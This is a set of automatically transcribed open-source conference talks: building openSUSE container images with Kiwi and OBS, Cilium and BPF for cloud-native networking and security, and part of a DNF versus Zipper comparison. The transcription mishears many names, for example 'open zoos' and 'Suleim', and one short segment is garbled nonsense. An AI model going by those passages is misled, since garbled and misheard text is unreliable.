contains this version of the package and other labels, which might be useful. Derived containers are built on top of other images, which is a difference compared to other images like QCOR images, VM images. So you actually have to solve dependencies for those images. If you want to build a container based on open through the Leap, like let's just say a Selium container, you say, I want to base Selium on open through the Leap container. OBS then downloads the latest version of the open through the Leap container, reference in the project config, and Kivi just adds packages on top of the image. Container labels are quite complex. We need labels for image version at build count and also much more images. So we actually have 16 labels to define. We have to define each label twice as the current system of labeling and docker table containers means that if you derive an image, it overwrites all labels defined in the base image. That means we have to, for every base image and for every derived image, add another set of labels duplicating the existing information so that you don't overwrite all copies of this information. Of course, this is a mess if you have to define all those 16 labels by hand. But we have OBS helping us. We can run custom scripts doing the build using OBS services. It looks like this in a underscore service file. You can just say, yes, I want the Kivi meta info helper script to one before building. And I want the Kivi label helper to one. That way, the labels only look like this, which is much less messy than the previous selection, as you can see there. It's actually doable. And most of this content is actually auto-generated, as you can see by the markers in the 50 percentage marks, like percent build time. About official images, what makes an image official? Of course, it has to build an OBS so that everyone can download the source and uses the official open zoos sign-in keys that everyone can verify that the binary is authentic. It takes care of actually honoring the L that way, as everyone can download the image sources to this corresponding image, which OBS actually makes easier using the distware tag, which is also defined on the list here. So you always know if you have a Docker container or other image, which source on OBS it is built from. And the extractor version, you can check it out using OSE directly if you want to. An official image also has to go through the whole open zoos review process, which not only means independent review from a community member from the open zoos review team, but also legal checks that you don't include any files on a proprietary license or license you cannot distribute binaries of. And it also can only use packages from the open zoos project on the OBS, which also went through the review process. And so you can be pretty confident if an image officially built by open zoos is actually only containing open zoos. If you want to submit your own image to open zoos, it's actually as easy as just submitting to an open zoos distware project. If you build it in your home, you can do whatever changes you want, then just submit to open zoos effectively update after doing the usual stuff like picking a develop project and maybe finding some other co-maintenance that can take care of if you're not available. For new images, there has to be an extra step to actually make the image downloadable, which is normally calling someone from the community using, from the release team using ISC or writing a mail. That should be a relatively painless process as the image is at that point normally building already. Kivi profiles are a really handy feature to build multiple images from the same Kivi files. So if you want to have one container for LXC and one for Docker, you don't actually need to do it twice. You can say, oh, have this Kivi file, and please build this for Docker, and please also build it for LXC. For that, you can, of course, define a profile in the Kivi header, which you also probably can't read. Then you can say, I want for the LXC profile, I want a different package selection. You tell that Kivi using the package profiles equals LXC tag, and then a different package selection as well. It is especially handy if you combine this with the OBS underscore multiple feature, which contains one of those magic strings above, which you can see on the right, the OBS build profile. Command above there, which is passed by OBS before building. And they underscore multiple file, which defines which profiles to build. In this case, just a single package on OBS builds two images, one with the Docker package selection, one with the LXC package selection. One complex example is Micro S, which combines flavor and platform, flavor being something like container host or just bare Micro S, which is Micro S without any container engine on it, and a platform, which is KVM and Xen, VM, there, OpenStack, can be anything. And you definitely do not want to create a Kivi image for every one of those combinations. That's just too much work. And profiles can be used for that. What got implemented just for this use case is having profiles which depend on other profiles. In this case, it's defined that the container host KVM and Xen profile depends on the container host profile and the KVM and Xen profile. The container host profile pulls in packages you need for the container runtime, and the KVM and Xen profile contains packages you need for KVM and Xen, like these vise guest agents, for instance. Another useful package is Live at your S-trapers, which you definitely want to use if you build your own custom image and not based on a existing container. It's a package which sets up the official OpenSUSE repositories in your image build by just using the ScaleCityControlXML, which is used during D4D installations. It's passed during build time, and it then adds the fitting repositories for your distribution. If you build against lib, it pulls in the lib OSS repository, for instance. And if you build against tumbleweed, it pulls in the tumbleweed OSS repositories. This also works for different architectures, as, for instance, the tumbleweed ARM repositories have a different URL than the tumbleweed x86 repositories. You can easily use that by just installing the Live at S-trapers package in your KV file and then calling a simple at S-trapers in configs age, and it's taken care of. The package can then be removed again, but you can also keep it if you want. It's just a calibrator. The release process for OpenSUSE images is fairly complicated, but you also don't really need to know that if you just start the release team, that your image is ready for publishing and download OpenSUSE.org or that you open to the container registry. Images are all built inside the OpenSUSE factory main project in the images repo, and then the binaries are released when the new snapshot is built into a separate project. From there, OpenQA notices that a new image is built and pulls the image once if you test, depending on the image. And if it's green, the project is released into a D-publishing project. For containers, they take a different path and go to the OpenSUSE container registry. The Docker Hub images are a different workflow. They are actually pulled after 15 minutes from a different bot running on a different system and copied from the OpenSUSE container registry to Docker Hub. And here are some resources you can definitely use if you want to build your own images. There's a wiki page about building derived containers specifically, and there's also a link to the image template paid on RBS. And what you definitely do not want to miss if you work with Kivi is the official auto-generated documentation for the XML format, which documents literally everything you can do with Kivi and always the latest versions as at this link. It tells you exactly which XML element is expected where, and also what this XML element means. It's the ultimate source of truth, as it's generated from the files which Kivi uses internally to pass those XML files. So it's always correct. Yes, and that's it. Any questions? OK. So does it support multi-architecture? So creating the container images for not just that x86, but ARM and Power, et cetera? Yes, OBS does that natively. If there are multiple architectures in a container project enabled, OBS actually measures them together and pushes them all at once. And you can even mix them from different projects. For instance, the OpenSUSE images for ARM are built in a different project as the OpenSUSE images for x86. Just merge into the same project and OBS does the magic so that they are both available as OpenSUSE slash LEAP, for instance. Cool. This is kind of more of a statement. But if you look at the soft dependencies with patterns in tumbleweed again, you'll find some things fixed. Like, the minimal-based pattern doesn't recommend grub anymore. And we'd like the patterns to be more useful for containers. So if anyone can suggest more changes, we're happy to consider them. So you said that the dependent containers are pulling, let's say, the container they should be used as a base. Does that also mean it creates layers instead of basically rebuilding the container? Yes, that's done by Scopio and Umoji automatically. So basically, if I use them all together, my registry only downloads the base container once and then merges the layers. Yes, OBS keeps those layers separately. It's not visible on OBS directly, but they are actually the layers themselves at different tables on top of each other using the usual hash. So with this control XML mechanism that you've shown, does one limit, is this limited to OBS-provided repositories? Or can this be any URL of any third-party repository as well? It can be any URL which OBS can map to a local project, which means you can just pull repositories from any HTTP URL. It has to be a URL reachable from OBS inside OBS packages. If you write, for instance, download OpenSuser or repositories, home, colon, something, it has to map to a home project. But you can't just pull packages from Fedora if you want to. That doesn't work. As OBS builds, don't have internet access. OBS has to resolve those dependencies all internally. And you can't access packages which are not inside OBS. For official OpenSuser images, you have to make sure that the image only pulls in OBS repositories, colon, slash, which means that it honors the project configuration. This is necessary so that if in stagings you have an updated image, it builds against packages in the staging and doesn't pull in anything from a home project, for instance. No questions? OK, so thanks for listening. Thank you. Hello. Hello. Hello. Hello.
In this talk I explain how containers based on openSUSE Leap and Tumbleweed should be built and how the process for building and submitting official images works.
10.5446/54401 (DOI)
<|es|><|translate|> platform. Alright. Enough, let's go to the end going to my five speakers. I have six speakers. We'd like go for five, and they get to start. We have a two speakers for theras. au eh. That makes wow. I rai the world right now, okay. security. My background is very Linux specific, so I've been a current developer for about 15 years, not for SUSE. I was working for Red Hat for 10 years. But obviously, we're all friends. So let me grab this live presenter. So I would like to introduce to you why we actually started with Solium. And for that, I would like to give you some background. And before I even started working in computers, computers were a thing. And this age that I'm about to present, I didn't even experience myself. But I would like to walk you through how we have been running applications over the last 20 years plus. In the very beginning, there was this dark age where we had single-tasking. The CPU was not even shared. This, I did not experience. I was not in the computers when this happened. But we were already running applications, or code. We went into a phase where we were introducing multi-tasking. And then all of a sudden, the CPU memory was shared. But the application would still run and directly consume CPU memory and so on. This was the age when Linux distribution started popping up, like SUSE got started, Red Hat got started, and so on. We then entered the stage of virtualization. We figured, I don't want to actually deploy my application on a server and install it. I would like to virtualize this, run VMs, and run many applications on a particular server but inside of a VM. At this point, we started virtualizing literally everything. We had virtual routers, virtual switches, virtual storage. Everything we had before was done again, but the V was put in front of it. What we're going for right now is we're coming back. We're hiding out of VMs again, and we're running applications directly consuming Linux APIs again. So applications are actually containers. We are consuming Linux system called APIs again, and we're making applications share the operating system. So we're kind of going back to the multi-tasking age in some way. And this changed back. This is why we started Suleim, because most of the infrastructure tooling we have today was actually written for this virtualization age, like where we would typically serve network packets or storage for virtual machines and not for applications specifically. So what does that mean? Like, how does the Linux kernel cope for this new age of microservices in cloud native world? Let's take a look at some of the problems that kind of arise when we run microservices or containers on Linux. First of all, Linux, the Linux kernel basically consists of a ton of abstractions that have been introduced over the years. I'm listing a couple of here. There are many, many more. We have kind of the driver level. On top of that, we have kind of network device level, for example, and traffic shaping built on top, then routing, IP tables, filtering. Then we have sockets with the different protocol layers. We cannot actually bypass many of those. We are forced to consume each of them in the right order. And over the years, we have accumulated a lot of code in the Linux kernel. And right now, this definitely increases the chance that you hit, for example, a performance penalty. Some of what we would actually like to get rid of. In the last couple of years, we've seen some of the complexity move to user space for this purpose because not everybody was willing to pay this cost. We identified and said, this is actually not ideal. Let's find a solution that we can work with the existing abstractions, but bypass them when necessary, for example. We'll go into the details. Another thing is that this is kind of the unix way of doing things. Every single subsystem in the Linux kernel has its own API. So we don't have one big tool to control everything. Every single subsystem is controlled by a separate tool. We have for a bit of an arching specific, but we have ETH tool. We have IP. We have if convic. We have sec comp. We have IP tables. We have TC. We have TCP dump. We have bridge control. We have OVS cattle, and so on. Our wide tiers of tools and users have to consume every single tool and users that's not necessarily an actual human that could be an automated tool that controls the system. And all of these tools are calling these APIs. It is becoming very difficult to actually orchestrate all of them together. A very specific example is if you have five, six tools on your machine, on your node, all consuming IP tables and trying to install IP table rules, then actually conflict with each other. The last kind of example that makes it difficult is that cloud native computing requires that the operating system continues evolving, because it now again consumes the operating system in a very native way. The Linux kernel development process has some good sides and some bad sides. So the good sides are definitely an open and transparent process. This is probably the biggest benefit of Linux that it's completely open. Excellent code quality, at least we think so. It's very stable, because a lot of people are running it and it has been stabilized over many years. It's available everywhere, literally runs on every piece of hardware. It's almost entirely vendor-neutral, but then there's some bad things as well. My slide pointer is a bit slow here. That's why I'm a bit struggling. It's really, really hard to change. So getting a Linux kernel change in literally takes weeks or months. From intent to implementation, to getting a change in takes weeks. And then it takes month or year until that change actually makes it down to the users. So once we have identified a need for a change, it takes us years to actually get that to the end user for consumption. This is why we see most of the kind of tooling that we built consuming very old APIs, right? Like cloud native computing tooling is currently built on, for example, IP tables, which has been built 25 years ago. It's not been intended for this at all. But we're really struggling to do something else, because it's so hard to change the kernel and make that change available to users quickly. It has a very large and complicated code base. And this is simply because of backwards compatibility. We were never actually removing code. We're only adding, adding, adding. And then everything we ever added, we have to support for the next how many years. We were never actually removing anything ever again. Upstreaming code is hard, not just from a complexity perspective, but also from a consensus finding perspective. Everything will change. Pretty much everybody has to agree to it. This is making it hard. Time consuming, of course. And then, yeah, I already talked about this. It can take years to become available. So these are some of the problems we have been struggling with. And then also the last one, the kernel doesn't actually really know what a container is or what kind of the base unit of an application is at this point. So let's figure out what the kernel actually knows and what it doesn't know. So what the kernel knows is it knows about processes and it knows about threat groups. It doesn't actually know specifically what is an application. It knows about C groups. Container is consuming C groups. It has limits. Like it can do accounting. It can limit the CPU. It can limit memory. It can limit network. This C group is typically configured by the container runtime. We see. It knows about namespaces. This is where the confusion or kind of the assumption is coming from that containers are some sort of isolation. What literally all this is is that the kernel will kind of namespace certain data structures. And for example, have multiple network namespaces or multiple user namespaces or multiple mount namespaces and so on. It doesn't actually still don't know what a container is. All it knows is that I have multiple namespaces for data structures. It knows about IP addresses and port numbers. This is configured by the container networking. And it knows about system calls made. It knows about the SC Linux context. This is pretty much what the kernel knows about. It does not actually know that I'm running this particular container. So examples here of things that the kernel has no clue about. The kernel does not know what Kubernetes is. The kernel does not know what a Kubernetes part is. The kernel does not know what the container ID is. No clue. The kernel does not know what the application actually would like to run. So if you're running a Kubernetes part, which consists of multiple containers, the kernel does not know that these containers are actually supposed to work together. So all of these things kind of makes the kernel struggle to provide a good application framework, because there's no concept, no native concept, such as a container in the kernel. It only provides the tooling and the container on time on top provides the instruments for a container on time to use that. So what do we do? Containers are a clear thing, and containers are winning. So what do we do? We have a couple of options. We can give all of, kind of, give the hardware away to user space, and user space can kind of rewrite everything from scratch. We've seen that a couple of examples would be DPDK, UDMA. Typically, this has been done for performance, not for functionality needs. Another alternative would be Unicernals. We can start kind of just rewriting a new kernel subsystem, Unicernal, and start have applications consume their own pieces of operating system and only consume what they actually need. We can move the entire operating system to user space. User-mode Linux has been a thing, so it has been tried, and some people are using it. Or we can decide to rewrite the entire Linux kernel, which is probably a hard task and quite expensive. The calculation up on the slide is very old. It's probably way more expensive to actually really do it. But this is an option that we could follow. Come on. So we're not kind of fading into, this is the background. So it's clearly not a perfect fit. So let's look at how we could do it better. And in order to understand BPF is what we're using, we need to understand what the kernel actually does. It's fundamentally an event-driven program. We have interrupts coming from the hardware side, and we have system calls coming from our application and processes, and the kernel will execute code based on these events. That's fundamentally what the kernel does. There's not much more that it actually does. Sorry, it takes about one minute or like 10 seconds to go to the next slide. So what is BPF? So BPF is consuming this base assumption that everything is event-driven, and it makes the Linux kernel programmable. So it introduces what we call a highly efficient in-kernel virtual machine, which means that we have some sandbox concept where we can run code in a safe and efficient manner every time certain events are being handled or popping up inside of the Linux kernel. And we'll look at a couple of examples on the next slide. So we can run a BPF program every time a system call is being made, or we can run a BPF program every time a block IO device is being accessed. We can call and run a BPF program every time a network packet is being received or sent. We can call it for every trace point. So we can call it, for example, when a 3CPU retransmission event happens. We can call it for kernel probes, so for arbitrary kernel functions, and even for user-space application functions, U-probes. So you can run a BPF program when your application code calls a particular function. Wow. So we can extend and program the Linux kernel with arbitrary additional logic when certain events happen. This is the promise of BPF, and this is why so many people are excited about this. BPF in the wild seems to struggle to kind of load some of the logos. So the first example on the top left is Facebook. So Facebook is a heavy, heavy, heavy user of BPF. All infrastructure, low-plancing, DDoS mitigation, low-plancing is all done in BPF today. Second example, Google, QoS, traffic optimization, network security profiling. We don't know that much about this because they're just consuming BPF in its raw form and do all of these things, but don't tell the world a lot about it. You can go find information at some conferences, but I do talks, but typically they're not broadcasting everything publicly. Then, Suze. Suze is using, like, BPF via Suleim to do networking, advanced security, low-plancing, and traffic optimization. Cloudflare is using BPF to do DDoS mitigation. Cystic Falca is using BPF for container runtime and behavioral security profiling. Reddit is using BPF for profiling tracing, and they're working on an IP table to replacement upstream. Then, of course, Suleim, which we'll talk about next. And then even Chrome is using BPF. So when you have Chrome plugins and you run them, BPF is used to isolate the plugins and make sure that it can only execute certain system calls. So all of you are already heavily using BPF, but so far it has been well-hidden as kind of a kernel-level implementation detail. Now they're coming up. So how does BPF look like? So it's a virtual machine. What does that mean? So what it really means in practice, I can write a program like this, simple example. And I can say this program runs when the exec system call is executed and returns. And in this example, I'm collecting some samples. And for example, measuring how many of those system calls am I making? But I could actually make this program more complex. And for example, say, no, you are not allowed to make this system call. Or I could modify the system call arguments. So I have a lot of flexibility in what I can do. But this is a very simplistic example that shows you what you can do. I will do a very quick introduction of kind of what you can do with BPF. So not shall you write code in pseudosc code. You compile that. You load that into the Linux kernel. The Linux kernel will verify that the program is safe. It will compile it. We'll talk about later. And then run it. In order for these programs to kind of communicate to the outside world, which would be user space, you can use BPF maps, which are data structures that can be accessed from both BPF programs and also user space. This is how you can expose, for example, data that you have gathered with a user space process. There's many types of BPF maps, hash tables, arrays, perfering buffer, and so on. We can call BPF helpers. Or BPF helpers allow BPF programs to interact with the Linux kernel. So not everything has to be done natively in BPF bytecode or BPF code. You could actually call kernel helpers, for example, to change content in the network packet or to redirect the packet to another network device, and so on. So all of this is done by BPF helpers. We can do tail calls. So we can call other BPF programs. It's similar to function calls. We can use a Chit compiler, which means we've write software bytecode, which is arbitrary. It runs on any infrastructure. And the Chit compiler in the Linux kernel will then automatically compile that either into x86, into R, and PPC, whatever. So it will run at native execution speed. This is a snapshot of the BPF contributors list to kind of understand who is behind BPF. And there's many, many companies behind this. It is maintainPy2 main engineers, Daniel Borkman and Alexey Zeravoytov. Daniel is working for Cilium Frost. Alexey is working for Facebook. Well, you can see contributions from red at Netronome, Facebook, Cloudflare, and so on. So it's not a Cilium specific implementation in any way. This is widely supported. Who uses BPF? Well, Facebook is probably the most prominent example, but I think they started at a while scale first. Basically, I think in 2018, one of the traffic engineers came up at a talk and basically said at the conference, well, every single packet into a Facebook data center since May 2017 has gone through a BPF program. And the world was kind of wow. Like nobody had any clue that they were using this in production for so long. So let's transition into Cilium. So I talked about BPF and it sounds exciting. But who wants to write low level C code or actually write these programs? So this is why we saw this potential, this incredible potential of BPF and figured, how can we apply this to this cloud-native world? How can we apply this to Docker, Kubernetes, and so on? And this is why we created Cilium. So Cilium is open source, open source project, Apache licensed, and it provides networking, security, and low-pallancing for cloud-native world. I will dive deep into several examples. A very simple one is Kubernetes networking. It's called CNI. In this kind of simple model, we simply provide networking for Kubernetes. So if you're on containers, if you're on parts in Kubernetes, Cilium will do all of the routing, all of the networking for these parts and ensure that parts can talk to each other. We implement Kubernetes services. Kubernetes services are a way to make applications scalable and give them a virtual IP or a service IP so you can reach many replicas of the same container via one single IP. This is how you can make your services highly available. Cilium with BPF provides a BPF-based implementation which scales better. The main reason it scales better to the traditional IP tables model is an IP tables model. It's a linear list of rules. So you literally scan through the list of rules until you find a matching entry and then execute this. The BPF implementation uses a scalable hash table. That just is faster and better. We can do cluster mesh. So we can connect multiple clusters together. Not only on the networking level, but we can also do service low-pallancing across multiple clusters. So for example, I'll say that this service should be highly available. So I will distribute it or deploy it over multiple clusters and have Cilium do the low-pallancing that when all the replicas in one cluster fail, it will automatically fail over. You can define service affinity and say, it should always prefer a local replica first. And if no local replicas are available, move over. So we can connect multiple clusters together. We can do identity-based security. What does that mean? Very simple. Typically, firewalls used to work on IP addresses. So you would either directly configure the firewall to say, allow from this IP, allow to this IP, or allow this subnet. What we're doing is a bit more modern. We're actually giving an identity to every service, to every container. And we're encoding the identity in all communication, in all our packets that are being emitted. You can see this here. This yellow box here. And then when we receive those packets, we can actually authenticate and validate the identity of the sending container. This is more secure and much more scalable. We can do API-aware authorization. Like, what does that mean? It's, again, it's kind of a step from the VMH into the container age, because typically, we would have done something like this. We would have either allow kind of an L3 firewall rule, or you say, this service can talk to this service, or this container can talk to this container. And typically, we do this based on IP addresses, or container names, or pod labels. You then kind of say, OK, I want to be a bit more fine rate and lock it down to a particular port. Let's say you can only talk on port 80. But this is still a problem in this new cloud 80 for age, because everybody's using TRPC, REST APIs, and so on. So literally, as you open up, let's say, port 80, you open up your entire REST API. So what we can do is we can, for example, lock it down and say, yeah, you can talk on port 80, but you can only do a get to slash foo. And everything else is blocked. So if you do a put to slash bar, we will block it automatically. That's kind of a cloud 80 for a container-aware or an API aware firewall. This is what we believe is necessary for this new edge that is coming up. Give you a simple example. We support many protocols. HTTP is obviously one, but Cassandra is another one. As you go as deep and say, hey, I actually want this container to be able to talk to a micro-sunder cluster, but it should only be able to do a select and only on this table. So no inserts, no updates, and it cannot access any other tables. So you can really start locking it down. And this is absolutely fundamental in the age of containers and microservices, because you will have many services talking to shared resources. Cassandra, Kafka, Redis, Memcached, all of them will be shared, and you need security to actually lock this down properly. Going deeper, we'll have services that talk to outside of the cluster. It's not just service to service communication. You might have a service that is talking, let's say, to suz.de. How do you secure this? Suz.de may only be backed by a couple of dozen IPs or something like this. But as you start talking to something like AWS S3 or drive.google.com, these services, they're literally backed by thousands of IP addresses. And there's no way you can whitelist that based on IPs. It's not even a known subnet that would represent that service. So how do you specify security that allows the service to talk to S3 or to drive.google.com, but not to anything else? In this case, we're using DNS server policy. So a simple example, there's a frontend service, and it's doing an HTTP request to suz.de. Obviously, it would do a DNS request. So it would resolve suz.de. And in this case, in the case of Kubernetes, the DNS server would return back and say, hey, this is the IP address of suz.de. With Sulu, we can define a policy that says, hey, you can talk, but you can only talk to something that resolves to start suz.de. And Sulu and BPF will come in and look at the DNS communication and will record the IP that was returned by the DNS server and then only whitelist that particular IP. So it's not kind of polling or trying to look up all the possible IPs of the DNS name. It's actually looking what the DNS server responds and then only allowing that communication. So that's another example of cloud-native security that we need. Then we can do fancy stuff. Who knows about service mesh? Couple of fans. Great. So service mesh, very briefly, concept that you're running a sidecar proxy in every Kubernetes part or in every part, and all the communication between services is going through that sidecar proxy, and it's basically getting proxy. This allows to implement mutual TLS, retries, tracing, localancing, for example, path-based localancing, kernel releases, and so on. The downside is that this introduces a lot of overhead because instead of having one connection between services, you have a connection from service to proxy, proxy to proxy, and proxy to service. So from one to three. So the memory consumption explodes, the latency explodes, and so on. This sidecar proxy is always running on the same node, on the same machine as the service. Why do TCP? So TCP was done to survive a nuclear blast. Why would we want to do TCP there? So what we do is we recognize this connection, and we see that both sockets, the socket of the application and the socket of the proxy are on the same node, and we simply start copying the data between the sockets. And this gives us, like, a 3x performance increase. You can see it on the slides there. It's fantastic, all thanks to the power of BPF, which gives us this flexibility. And then kind of looking into the future, we can do something like transparent SSL visibility. Maybe some of you have heard about KTLS, kernel TLS. It was done by some of the big providers of video streaming content when they started enabling TLS. They really started to care about how expensive it is to basically produce that video or deliver that video with SSL encryption. And it turns out if we offload the SSL encryption from the application library into the Linux kernel, it gives us a 3% to 4% increase of performance. So this is why KTLS has been done. We can use KTLS to basically, even if the application is using SSL encryption, to gain insights into the data that the application is sending. And for example, do the layer 7 or the HTTP-WR filtering, even if the application is using SSL. If you want to learn more about this, there's a Qt contact from last year that goes into all of the details of this. So Scylium use cases, we went through them. This is a summary. So Scylium provides container networking. It's highly efficient. It's using the same techniques and the same method as Facebook and Google and all the others are using internally. It can run in multiple modes. You can run it in routing mode. You can do overlays. You can do cloud provider native modes. We support IPv4, IPv6. In fact, we have been IPv6 only for the first year. We tried to go really native and say, everything will be IPv6 at some point. We can do multi cluster routing. We can do service load planting, really scalable. We're not doing any L7, no path-based routing. But we're doing efficient L3, L4. We implement Kubernetes services, replacing Qproxy. We can do service affinity. We can do cloud native security, all the examples we provided, identity-based, like layer 7-aware, DNS-aware, and so on. We can do encryption. So we can encrypt everything transparently. And basically turn this on, and we will encrypt everything inside of cluster and across clusters. And we can do the service mesh acceleration. And all of these are key components to run services or containers in a very efficient and secure way on Linux. So all of this we do as part of the Linux kernel, which means it's all completely transparent to the application. Because it's basically, it looks like it's a property of the operating system. So with this, this all the slides I had. I'm sure you guys have several questions. I think we have some time for questions. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yeah. Yes. I will also repeat the question. Feel free to just shout. The question is, does it support mutual TLS? So it itself does not do mutual TLS, but you can run on-voy, STO, Linkedie, on anything on top. So it does support encryption and authentication, but we're not using TLS. So we have a method that we can integrate with, for example, Spiffy. Spiffy is in a service identity provider. But we will use IPsec in the Linux kernel to actually enforce it. We get the transparent on the indication, but it's not MTLS specifically. Any more questions? All right. Thank you very much. If you want to learn more here, the links, Slack, GitHub, website, Twitter, and so on. Thank you very much.
Linux is the dominant platform to run microservices using cloud-native architectures. These modern architectures impose new challenges on the platform serving the applications. We'll take a peek at BPF and Cilium and how it revolutionizes both networking and security to enable platforms built on top of it to fully utilize the benefits of cloud-native architectures. Thomas Graf is Co-Founder & CTO at Isovalent and creator of the Cilium project. Before this, Thomas has been a Linux kernel developer at RedHat for many years.
10.5446/54403 (DOI)
Hello, everyone. So, my name is Neil Gampa. I'm a contributor in Fedora Project as well as in OpenSuzan and whatnot. And here I'm to talk about like DNF versus Zipper, you know, fight, because, you know, why not? So, a little bit about who I am. I'm sort of a self-styled open source advocate. I'm a contributor in package maintainer in Fedora, Magia and OpenSuzan. And I've contributed to RPM, DNF, Zipper, Kiwi, the OpenBuild service and a number of the system management-based stuff. For my day job, I'm a DevOps engineer at Datto, a disaster recovery backup business continuity company. And part of my role involves managing the release engineering of our software, including running an OBS instance internally and doing terrible package backport things, because, you know, that's what always happens when you're in a corporate environment. So, let's kind of start with introducing the two package managers. So, to begin with, like, the one that most of y'all probably aren't too familiar with, if the slide would move, there we go. DNF. So, it's a successor to the Yellow Dog Updater modified or YUM, as a lot of people may vaguely know of from the Red Hat ecosystem. It was forked from YUM about five, six years ago to rework the internals to use the Libsolv library and to offer a saner maintainable API. It offers a defined plugin architecture for extending the package manager functionality. It is the package manager in Fedora, Open Mandrieva, Yachto, and now Red Hat Enterprise Linux as of REL 8. It is available also as a supported package manager in Magia. It is included in OpenSusa as of LEAP-150, and it actually was included in REL 7 as of REL 7.6 as an option for you to use instead of crappy old YUM. And then, of course, the classical zipper thing. You guys all kind of know this. It's the package manager that made a whole new class of package managers in itself. With SAT Solving at a large scale, it replaced the motley of crazy-ass package management options that we all inherited from Zimian and Sousa back when the two companies kind of came together when Novel bought them both. Spawn the development of the Libset Solver, which became Libsolv. It is used primarily today in, of course, the Sousa distributions as well as Tizen. And it is also in Fedora since Fedora 26, courtesy of yours truly. So it is kind of functional all the way through Fedora 28. After that, not so much. So some of the similarities here, I mean, because there are, of course, similarities between the two. So they both use Libsolv for dependency resolution. The low-level aspects of both package managers are in C and C++. Plugins are supported in the base library interfaces, and they both work with package kit. So like anything that's leveraging package kit on these distributions that use the DNF or zipper will be able to leverage those backends correctly. They exclusively handle RPM metadata repositories. This technically wasn't true in the past because zipper used to handle YAS repos, but it doesn't anymore. It silently says, well, YAS, repos don't exist. We're going to do RPM repos instead. And both of them actually do support fairly well being able to build custom front-end interfaces. And, of course, arbitrary subcommands through extending through either modules, Python modules, or C++ programs or whatnot. The user experience between the two is actually fairly similar as well. The CLI interface structure is the same. It's the tool with the action, with the arguments for the action. Subcommands in both DNF and zipper have standard abbreviated forms. This is something that maybe some people aren't familiar with, that in the DNF package manager, they've kind of adopted the same technique that the zipper people have, where common subcommands have a short form that's easier to type and remember so that you don't necessarily require bash completion to be able to get to them. And, of course, the CLI supports colors when the terminal supports it and will help you distinguish stuff when the colors are activated. There's graphical front-ends to offer more intuitive user-friendly ways to do software management as well, of course. But there's a fair bit of differences, too. The underlying differences between DNF and ZipStack are actually quite significant. The biggest one is that the underlying architecture for the DNF stack is very, very modular. It is split up across five or six libraries if we exclude librpm itself and libsolve, whereas the ZipStack is one library when you exclude all of that, when you exclude those. One thing that's a little bit scary and surprising is that Zipper actually installs packages by subprocessing out to the rpm command. From what I understand, from eons gone by, they couldn't trust librpm to do the right thing, so they subprocessed it and did scary things to make sure everything looked like it worked. DNF, however, has no such compunction and uses librpm to install things directly. So the transaction is handled directly by rpm through the library interface and doesn't look quite as terrifying from the 10,000 feet view. The way that you install collections of packages is slightly different between DNF and Zipper because of the composition groups and now new module metadata stuff. So Fedora has this new modularity thing, which has a new extra metadata format with more stuff and it's kind of complicated, but it adds more things to how DNF can handle collections of packages, whereas of course Zipper has the patterns, which you all are familiar, are basically very fancy meta packages with extra properties attached to them so that Zipper knows how to find them. One of the things that was actually kind of surprising when I first started comparing the two stacks years ago when I was first looking at this was that language bindings in Zipper are actually in a pretty poor state. The zip bindings thing is not in good shape and is essentially unsupported and don't work, whereas in the DNF stack as a consequence of how the front ends are implemented and some of the legacy language bindings in the libraries are actually a first class citizen and while it only currently supports Python, more languages are expected to follow in the near future. And DNF also has an implementation that exports the API as a debuff interface for applications to interrogate and manipulate through that manner if they wish. That's something that as far as I'm aware only a yum DNF and apt actually have some form of this. Not very many package managers have a direct way to be interrogated via debuffs. The user experience is actually somewhat different as well, but not too much so. DNF has the feature of aliases, which it inherits from yum, so you can have sub-commands that you can define that are built on standard commands with options and things like that so you can make short forms of custom short forms of whatever you want. Another thing that DNF does that is different from Zipper is that you can actually install any package based on any file path that is known by the repository because DNF actually parses the file lists completely and handles that in its solver pool, whereas Zipper does not normally do that. And there's multiple native graphical front ends. Zipper has, to its credit, it has strangely enough a machine readable output form XML for its output so that it can be manipulated from other tools through shell, script, and awk, and pearl, and stuff like that. One really neat thing that it does is that it can split transactions up into smaller chunks if it detects a low disk situation or if there's a special solver situation that requires splitting the transaction up. That is really handy when you're working with laptops and with small SSDs or netbooks and things like that, and that's a really nice fancy feature to have. Unfortunately, Yast is the only graphical front end that exists for it. Yast is cool and all, but the fact that there isn't an independent front end that kind of just works on its own makes it a little difficult to demonstrate how well to use the libzip API for building such things. So, yeah. As far as the ecosystem goes, we can kind of start with the development activity of the actual package manager software itself as soon as that shows up. There we go. So, for DNF, the first, for DNF and Zipper, the two ones at the top are actually the command line front end. So, you can see that the DNF one starts in 2002. That's because it was forked from YAM. So, if you ignore everything before 2012, that's all, 2012 and earlier is all YAM code. Forward on that is DNF. And in Zipper, you can also see that by comparison, there isn't a whole lot going on in the CLI land. That's because, unlike in DNF, Zippers stack, the CLI doesn't actually have a whole lot of logic in it. Most of it is in the library. And so, you can see comparatively, libzip has a lot more code going on in there. Whereas, on the DNF side, it's a little bit mixed. There's a lot of business logic in both the CLI front end as well as in the libraries. And that's something, hopefully, that will be fixed over time. In terms of, like, how the ecosystem tends to use this, the plugins and extensions model is something that is very well supported in DNF. And it's something that I think actually has been a really good boost to how that has been used by a lot of people. Because the API is now stabilized and well-defined, there's been a lot of plugins and extensions for supporting interesting workflows and tools and things like that. There's, like, over 25 officially supported plugins off the top of my head. I know of at least a dozen more that people have written that they're using. And then there's also things like Salt and Ansible, which poke the DNF API directly because they can and they know that that stuff is going to work. And that allows them to do more creative things when they need to. For Zipper, I'm actually not too certain if there were that many plugins that were written for it. I could only really find a few major ones, like the one for Spacewalk, Susan Manager, and the customer center package search plugin. Those are the only ones I could really find. I couldn't really find too many others. The methods to support plugins and extensions doesn't seem to be that well documented or pointed out anywhere. It was a little curious because, like, from what I could tell, it is supposed to be capable of it. It's just not used, which I'm a little weirded out about. But another bit, like as I mentioned earlier, there was also graphical front-ends for the DNF stack, multiples of them. And, of course, is because the CLI is scary. It's, ooh. But aside from the package kit front-ends, like NOM Software and Blasma Discover, there's a few native front-ends that exist for it. The first was actually Yumx DNF, which was the Yumx tender DNF flavor. That project is now defunct, and it's been superseded by DNF Degora, which is from the Magia project, and SimpleDNF, which is made by some independent developer who wanted to make a much simpler GTK-based front-end. Actually, I think it's brand new. I only found it, like, a couple of weeks ago. And so I'm going to show you just a little bit of that stuff with the DNF things. So let's see here. Oh, come on. Don't do this to me now. Fine. Let me kill this. And then let's go over here. Let's start this. Okay. Okay. There we go. So here I pre-loaded a transaction here to show. So let's make this a little bit more simple. Whoa. That is not what I wanted. So if you see what is... Oh, I see what is going on here. So if you see over here, this is... I'm about to execute a transaction to 